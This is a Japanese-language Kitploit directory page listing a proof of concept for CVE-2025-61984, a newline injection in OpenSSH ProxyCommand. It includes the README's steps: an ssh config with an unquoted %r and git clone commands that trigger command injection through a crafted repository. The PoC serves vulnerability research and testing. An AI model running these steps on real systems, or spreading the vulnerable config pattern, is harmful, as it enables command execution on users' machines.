Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-61984-poc — OpenSSH ProxyCommand(CVE-2025-61984)における改行インジェクションの脆弱性を実証する概念実証コードで、細工されたSSH設定を介したコマンドインジェクションを可能にします。 | Kitploit
ツール/GitHubGitHub/dgl/cve-2025-61984-poc
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテストレッドチーミング
GitHubdgl/cve-2025-61984-poc

cve-2025-61984-poc

OpenSSH ProxyCommand(CVE-2025-61984)における改行インジェクションの脆弱性を実証する概念実証コードで、細工されたSSH設定を介したコマンドインジェクションを可能にします。

リポジトリを見る
71391年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
ウェブサイト
共有

CVE-2025-61984 PoC

これは、改行を使用してOpenSSH <10.1のProxyCommandを混乱させる概念実証です。詳細な解説。

実行方法

以下を含む.ssh/configを設定します:

Host *.example.com
  ProxyCommand some-command %r@%h:%p

(コマンドは何でも構いません。引数内のどこかに引用符で囲まれていない%rが必要なだけです。)

次に(bashの場合)実行します:

$ git clone --recursive https://github.com/dgl/cve-2025-61984-poc

または$SHELLとしてfishを使用している場合:

git clone --recursive -b fish https://github.com/dgl/cve-2025-61984-poc

シェルを使用していないがこれをテストしたい場合は、次のように実行できます:

$ SHELL=/bin/bash git clone --recursive https://github.com/dgl/cve-2025-61984-poc
ツールをダウンロード